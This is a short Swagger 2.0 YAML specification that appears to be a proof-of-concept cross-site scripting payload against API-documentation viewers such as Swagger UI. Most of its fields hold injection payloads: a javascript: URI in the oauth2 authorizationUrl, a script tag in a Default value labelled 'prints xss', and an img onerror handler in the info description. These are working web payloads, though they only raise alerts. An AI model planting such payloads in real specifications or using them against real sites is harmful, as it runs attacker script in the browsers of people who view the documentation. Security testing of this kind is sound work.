swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
Definitions:
  Type: string   
  Description: prints xss   
  Default: <script>console.log(‘000000000000000000dad0000000000000000000');</script>
info:
  version: "0.0.1"
  title: Example Title
  description: Please Authorize! <img src=x onerror=alert(1) />
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
